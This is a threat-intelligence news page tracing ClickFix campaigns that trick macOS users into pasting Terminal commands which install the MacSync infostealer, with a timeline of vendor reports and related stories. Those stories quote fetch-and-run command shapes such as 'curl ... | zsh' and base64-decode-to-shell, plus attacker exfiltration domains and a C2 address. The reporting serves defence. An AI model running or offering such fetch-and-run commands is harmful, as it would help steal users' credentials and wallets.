ClickFix Campaigns Deliver MacSync Infostealer to macOS Users
Researchers reported three ClickFix campaigns that used social engineering rather than software exploitation to infect macOS users with the MacSync infostealer. The activity evolved over several months, beginning with fake sponsored search results for an OpenAI Atlas browser download hosted on fraudulent pages, then shifting to malicious workflows that abused shared ChatGPT conversations and GitHub-themed landing pages to make the infection chain appear legitimate. In each case, victims were instructed to open Terminal and paste commands, allowing the malware to be installed through user action instead of a traditional exploit.
The most recent campaign introduced a more advanced MacSync variant with multi-stage loaders, dynamic AppleScript payloads, and in-memory execution intended to improve evasion and persistence. Reporting indicates the later activity targeted users in Belgium, India, and parts of North and South America, while researchers said it remains unclear whether all three campaigns were conducted by the same threat actor. The findings underscore a broader trend of attackers adapting ClickFix lures for macOS, using trusted platforms, sponsored links, and fake AI-tool installers to steal credentials and other sensitive data while bypassing file-based defenses by persuading users to execute the attack themselves.
Timeline
May 1, 2026
Lazarus uses Mach-O Man ClickFix lures to deploy macrasv2 on macOS
On 2026-05-01, SC Media reported that North Korea-linked Lazarus Group was targeting high-value fintech and cryptocurrency professionals on macOS with a ClickFix campaign using fake Teams, Zoom, and Google Meet pages. Victims were tricked into running Terminal commands that launched the Mach-O Man malware kit, which staged fake macOS apps, harvested credentials and host data, and deployed the macrasv2 stealer.
Apr 21, 2026
Netskope identifies ClickFix campaign targeting Asia finance-sector macOS users
On 2026-04-21, Netskope Threat Labs disclosed an active ClickFix campaign targeting macOS users in Asia’s finance sector with an AppleScript-based infostealer that also has Windows-targeting capability. The campaign uses fake CAPTCHA prompts and a pasted curl command to steal credentials, Keychain data, browser and wallet information, and forces victims to enter their macOS password through a deceptive Apple-like prompt.
Apr 3, 2026
Breakglass maps MacSync C2 APIs and exposes SOCKS5 proxy monetization
On 2026-04-03, Breakglass Intelligence reported a newly identified MacSync command-and-control server and documented 29 API endpoints exposing a mature malware-as-a-service platform. The analysis showed MacSync could convert infected Macs into rotating SOCKS5 residential proxies and noted that Apple Developer ID certificate GNJLS3UYZ4 was still valid and signing MacSync samples, helping them bypass Gatekeeper warnings.
Mar 25, 2026
Recorded Future links five ClickFix clusters to Windows and macOS malware delivery
On March 25, 2026, Recorded Future’s Insikt Group reported five distinct ClickFix activity clusters targeting Windows and macOS users through fake verification and brand-impersonation lures. The report said several clusters delivered NetSupport RAT, while a dual-platform/macOS cluster was assessed with high confidence to deliver the MacSync infostealer using a common four-stage execution chain.
Mar 19, 2026
CIS warns MacSync campaign is impacting U.S. SLTT macOS users
On March 19, 2026, CIS CTI reported an ongoing ClickFix-driven MacSync stealer campaign affecting macOS users in U.S. State, Local, Tribal, and Territorial government organizations. The activity used SEO poisoning and fake CAPTCHA pages to trick victims into running Terminal commands, extending known MacSync tradecraft into a newly identified government-sector victim set.
Mar 18, 2026
MacSync delivery expands via SEO poisoning and fake verification pages
By early 2026, a separate macOS campaign used SEO poisoning around searches for PDF books to redirect users to fake verification pages that prompted malicious Terminal execution. The staged infection chain delivered an AppleScript-based MacSync stealer that exfiltrated credentials, browser data, wallets, SSH keys, cloud configs, and documents.
Mar 17, 2026
Claude-themed ClickFix campaign targets developers with MacSync
By March 2026, a campaign dubbed Claude Fraud was using sponsored Google ads and fake Claude-related sites, including pages on claude.ai and Squarespace, to target developers and security professionals. On macOS, victims were induced to paste Terminal commands that installed MacSync, and the campaign was reported to have affected more than 15,600 victims overall.
Mar 16, 2026
Sophos discloses three MacSync ClickFix campaigns targeting macOS users
On March 16, 2026, Sophos publicly reported three distinct ClickFix campaigns observed from November 2025 through February 2026 that delivered the MacSync infostealer to macOS users. The disclosure highlighted a clear increase in attacker sophistication and the growing use of AI-themed and trusted-platform lures to steal credentials, files, keychain data, and cryptocurrency seed phrases.
Mar 12, 2026
Breakglass exposes BarkBlitz crypto-targeting MacSync campaign
On 2026-03-12, Breakglass Intelligence reported that the MacSync stealer, also tracked as BarkBlitz, had been active since at least November 2025 and was targeting cryptocurrency users through ClickFix-style fake Zoom, Trezor Suite, and Ledger lures. The report detailed recovered AppleScript payloads, three C2 domains, malware signed with a stolen Apple Developer ID, and a capability to backdoor Ledger Wallet and Ledger Live for later seed-phrase theft and transaction interception.
Feb 1, 2026
Latest ClickFix campaign adds GitHub-themed lures and in-memory execution
In February 2026, researchers observed the most advanced MacSync ClickFix campaign yet, using regionally targeted pages impersonating trusted platforms such as GitHub and multi-stage loaders. The updated MacSync variant added dynamic AppleScript payloads, in-memory execution, and tracking infrastructure to improve evasion and victim profiling.
Dec 1, 2025
MacSync campaign shifts to ChatGPT shared-conversation lures
By December 2025, attackers had evolved their macOS ClickFix activity to use malicious or weaponized ChatGPT shared conversation links and other AI-themed installation prompts. The campaign continued to rely on users manually executing Terminal commands rather than exploiting software flaws.
Dec 1, 2025
Jamf flags ClickFix lures distributing MacSync on macOS
In December 2025, Jamf Threat Labs previously identified ClickFix-style lures being used to distribute the MacSync infostealer to macOS users. This marked an early public indication that pastejacking-style social engineering had expanded to MacSync delivery.
Nov 1, 2025
ClickFix campaign uses fake OpenAI Atlas browser lure to deliver MacSync
In November 2025, researchers observed a ClickFix campaign targeting macOS users through sponsored Google search results and a fake Google Sites page advertising a bogus OpenAI Atlas browser. Victims were tricked into pasting obfuscated Terminal commands that installed the MacSync infostealer.
See the full picture in Mallory
Mallory subscribers get deeper analysis on every story, including:
Who’s affected and how
Deep-dive technical analysis
Actionable next steps for your team
IPs, domains, hashes, and more
Ask questions and take action on every story
Filter by topic, classification, timeframe
Get matching stories delivered automatically
Related Entities
Malware
Organizations
Sources
5 more from sources like recorded future blog, cisecurity alerts, cloudsek blog, hackread and security affairs
Related Stories
ClickFix Social Engineering Drives Multi-Platform Malware Delivery
Security researchers reported multiple active campaigns using **ClickFix** social engineering—fake error dialogs or verification prompts that trick users into manually running attacker-supplied commands—to bypass browser and download protections and establish an initial foothold. In one enterprise case investigated by **CERT Polska (cert.pl)**, victims were lured via compromised websites showing a fake CAPTCHA/“fix” prompt that instructed them to paste and run a **PowerShell** command via `Win+R`; the script then downloaded a dropper and enabled rapid follow-on activity that can scale to **enterprise-wide compromise**, including deployment of secondary malware such as **Latrodectus** and **Supper** for data theft, lateral movement, and potential ransomware staging. A separate ClickFix operation targeted **macOS developers** by cloning the *Homebrew* site on typosquatted infrastructure; the “install” command was subtly altered to fetch content from `raw.homabrews.org` instead of `raw.githubusercontent.com`, leading to **Cuckoo Stealer** deployment and credential harvesting via repeated password prompts using macOS Directory Services, with related domains tied to shared hosting at **`5.255.123.244`**. ClickFix was also observed as the initial execution mechanism for the resurfaced **Matanbuchus 3.0** MaaS loader, which uses deceptive copy/paste prompts and **silent MSI** execution (via `msiexec`) to deliver a new payload, **AstarionRAT**, enabling capabilities including credential theft and **SOCKS5** proxying; operators were reported to move laterally quickly (including toward domain controllers), consistent with ransomware or data-exfiltration objectives.
1 months ago
Microsoft Warns macOS Infostealer Campaigns Using ClickFix Lures, Malicious DMGs, and Python Stealers
Microsoft reported that **information-stealing malware activity is expanding from Windows to macOS**, driven by campaigns observed since late 2025 that rely on social engineering and cross-platform tooling. The activity includes **ClickFix-style prompts** and **malicious DMG installers** that deliver macOS-focused infostealer families such as **Atomic macOS Stealer (AMOS)**, **MacSync**, and **DigitStealer**, with operators leveraging **fileless execution**, **native macOS utilities**, and **AppleScript automation** to evade defenses and automate collection. Initial access commonly starts with **malicious search ads (e.g., Google Ads)** that redirect users to fake sites impersonating legitimate tools and then trick victims into running “fix” steps or installing trojanized software. The malware is assessed to target high-value data including browser credentials and session cookies, **iCloud Keychain** contents, crypto wallet data, and **developer secrets**; Microsoft also highlighted growing use of **Python-based stealers** distributed via phishing for rapid adaptation across heterogeneous environments, citing **PXA Stealer** (linked to Vietnamese-speaking actors) as an example used in late-2025 campaigns with persistence mechanisms such as registry `Run` keys or scheduled tasks and **Telegram** used for command-and-control.
1 months ago
ClickFix Campaign Abuses Claude Artifacts and Google Ads to Deliver macOS Infostealers
Threat actors are running a **ClickFix**-style social-engineering campaign that abuses **Google sponsored search results** to funnel macOS users to malicious content hosted on legitimate platforms, including **Anthropic Claude public artifacts** (`claude.ai`) and **Medium** pages impersonating trusted sources (e.g., Apple Support). The lures target common search queries such as “online DNS resolver,” “macOS CLI disk space analyzer,” and “HomeBrew,” then instruct victims to paste and run Terminal commands that decode/execute payloads (e.g., `echo "..." | base64 -D | zsh` or `curl ... | zsh`). Researchers (Moonlock Lab/MacPaw and AdGuard) reported that the malicious Claude artifact accumulated **~12,300 to 15,600 views**, indicating significant exposure (reported as **10,000+** and **15,000+** potential victims across coverage). The payloads deliver macOS information-stealing malware, including **MacSync**, which collects data such as **Keychain credentials, browser data, and cryptocurrency wallet files**. Reported tradecraft includes downloading and executing a shell script, using an AppleScript component for theft, staging stolen data into `/tmp/osalogging.zip`, and exfiltrating via HTTP POST to attacker infrastructure (e.g., `a2abotnet[.]com/gate`, with C2 paths like `a2abotnet[.]com/dynamic`). The malware attempts to blend in by spoofing legitimate macOS browser User-Agent strings and includes retry logic for large/chunked uploads, then removes staging artifacts to reduce forensic traces.
3 days ago